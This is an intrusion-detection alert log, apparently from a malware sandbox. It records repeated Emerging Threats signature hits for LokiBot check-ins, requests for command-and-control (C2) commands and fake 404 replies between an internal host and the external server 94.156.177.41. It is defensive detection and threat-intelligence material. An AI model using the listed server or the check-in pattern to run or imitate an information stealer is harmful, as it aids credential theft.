2025-01-07T12:32:48.074620+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:48.074620+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:48.074620+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:48.821374+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:48.821374+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:48.826184+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49794	TCP
2025-01-07T12:32:48.984690+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:48.984690+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:48.984690+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:49.713193+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:49.713193+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:49.717963+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49795	TCP
2025-01-07T12:32:49.862472+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:49.862472+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:49.862472+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:50.609302+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:50.609302+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:50.614088+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49796	TCP
2025-01-07T12:32:50.758629+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:50.758629+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:50.758629+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:51.495138+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:51.495138+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:51.499943+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49798	TCP
2025-01-07T12:32:51.655150+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:51.655150+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:51.655150+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:52.422354+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:52.422354+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:52.427147+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49799	TCP
2025-01-07T12:32:52.567085+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:52.567085+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:52.567085+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:53.323679+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:53.323679+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:53.328635+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49800	TCP
2025-01-07T12:32:53.479625+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:53.479625+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:53.479625+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:54.426552+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:54.426552+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:54.431309+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49801	TCP
2025-01-07T12:32:54.584481+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:54.584481+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:54.584481+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:55.294818+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:55.294818+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:55.301802+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49803	TCP
2025-01-07T12:32:55.446641+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:55.446641+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:55.446641+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:56.184948+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:56.184948+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:56.189746+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49804	TCP
2025-01-07T12:32:56.333834+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:56.333834+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:56.333834+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:57.071831+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:57.071831+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:57.078314+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49810	TCP
2025-01-07T12:32:57.237309+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:57.237309+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:57.237309+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:57.962291+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:57.962291+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:57.967104+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49816	TCP
2025-01-07T12:32:58.121179+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:58.121179+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:58.121179+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:58.853828+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:58.853828+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:58.858821+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49822	TCP
2025-01-07T12:32:59.003527+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:32:59.003527+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:32:59.003527+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:32:59.720354+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:32:59.720354+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:32:59.725632+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49828	TCP
2025-01-07T12:32:59.878899+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:32:59.878899+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:32:59.878899+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:33:00.607397+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:33:00.607397+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:33:00.612312+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49837	TCP
2025-01-07T12:33:00.752916+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:00.752916+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:00.752916+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:01.490314+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:01.490314+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:01.502409+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49843	TCP
2025-01-07T12:33:01.662274+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:01.662274+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:01.662274+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:02.396007+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:02.396007+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:02.400864+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49849	TCP
2025-01-07T12:33:02.549471+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:02.549471+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:02.549471+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:03.285971+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:03.285971+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:03.290840+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49857	TCP
2025-01-07T12:33:03.476176+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:03.476176+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:03.476176+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:04.228379+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:04.228379+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49863	94.156.177.41	80	TCP
2025-01-07T12:33:04.233933+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49863	TCP
2025-01-07T12:33:04.420628+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:04.420628+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:04.420628+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:05.135088+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:05.135088+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:05.139877+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49869	TCP
2025-01-07T12:33:05.289917+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:05.289917+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:05.289917+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:06.011427+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:06.011427+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:06.016218+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49875	TCP
2025-01-07T12:33:06.157706+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:06.157706+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:06.157706+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:06.894211+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:06.894211+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:06.899543+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49882	TCP
2025-01-07T12:33:07.168337+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:07.168337+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:07.168337+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:07.922188+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:07.922188+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:07.927128+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49888	TCP
2025-01-07T12:33:08.065316+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:08.065316+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:08.065316+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:08.808854+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:08.808854+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:08.813925+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49898	TCP
2025-01-07T12:33:08.983613+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:08.983613+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:08.983613+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:09.719346+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:09.719346+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:09.729144+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49904	TCP
2025-01-07T12:33:10.036766+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:10.036766+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:10.036766+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:10.771269+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:10.771269+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:10.776074+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49910	TCP
2025-01-07T12:33:10.925247+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:10.925247+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:10.925247+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:11.659311+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:11.659311+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:11.664061+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49918	TCP
2025-01-07T12:33:11.841098+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:11.841098+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:11.841098+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:12.593371+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:12.593371+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:12.599063+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49927	TCP
2025-01-07T12:33:12.953872+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:12.953872+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:12.953872+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:13.817700+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:13.817700+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:13.822457+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49933	TCP
2025-01-07T12:33:13.973579+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:13.973579+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:13.973579+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:14.698696+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:14.698696+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:14.703463+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49941	TCP
2025-01-07T12:33:14.849018+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:14.849018+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:14.849018+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:15.583031+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:15.583031+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:15.589754+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49950	TCP
2025-01-07T12:33:15.804831+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:15.804831+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:15.804831+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:16.529723+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:16.529723+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:16.534583+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49956	TCP
2025-01-07T12:33:16.682925+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:16.682925+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:16.682925+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:17.415506+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:17.415506+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:17.420281+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49962	TCP
2025-01-07T12:33:17.566164+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:17.566164+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:17.566164+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:18.317821+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:18.317821+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:18.323422+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49968	TCP
2025-01-07T12:33:18.615544+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:18.615544+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:18.615544+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:19.383367+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:19.383367+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49974	94.156.177.41	80	TCP
